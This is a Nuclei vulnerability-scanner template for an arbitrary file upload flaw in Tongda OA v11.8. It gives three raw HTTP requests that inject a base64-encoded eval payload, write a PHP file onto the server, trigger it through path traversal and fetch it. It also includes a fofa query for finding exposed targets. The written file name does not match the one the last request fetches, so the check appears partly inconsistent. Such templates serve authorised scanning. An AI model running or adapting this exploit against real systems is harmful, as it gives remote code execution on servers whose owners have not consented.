id: tongda-api-file-upload

info:
  name: Tongda OA v11.8 api.ali.php - Arbitrary File Upload
  author: SleepingBag945
  severity: critical
  description: |
    Tongda OA v11.8 api.ali.php has an arbitrary file upload vulnerability. An attacker can upload malicious files to control the server through the vulnerability.
  reference:
    - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/tongda-oa-api-ali-upload.yaml
  metadata:
    verified: true
    max-request: 3
    fofa-query: app="TDXK-通达OA"
  tags: tongda,oa,fileupload,intrusive

http:
  - raw:
      - |
        POST /mobile/api/api.ali.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=502f67681799b07e5de6b503655f5cae
        Accept-Encoding: gzip

        --502f67681799b07e5de6b503655f5cae
        Content-Disposition: form-data; name="file"; filename="{{randstr}}.json"
        Content-Type: application/octet-stream

        {"modular":"AllVariable","a":"ZmlsZV9wdXRfY29udGVudHMoJy4uLy4uL2ZiNjc5MGY0LnBocCcsJzw/cGhwIHBocGluZm8oKTs/PicpOw==","dataAnalysis":"{\"a\":\"錦',$BackData[dataAnalysis] => eval(base64_decode($BackData[a])));/*\"}"}
        --502f67681799b07e5de6b503655f5cae--
      - |
        GET /inc/package/work.php?id=../../../../../myoa/attach/approve_center/{{trim_prefix(date_time("%Y%M", unix_time()),"20")}}/%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E.fb6790f4 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
      - |
        GET /{{randstr}}.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 200 && status_code_2 == 200 && status_code_3 == 200'
          - 'contains(body_2,"+OK") && contains(body_3,"phpinfo")'
        condition: and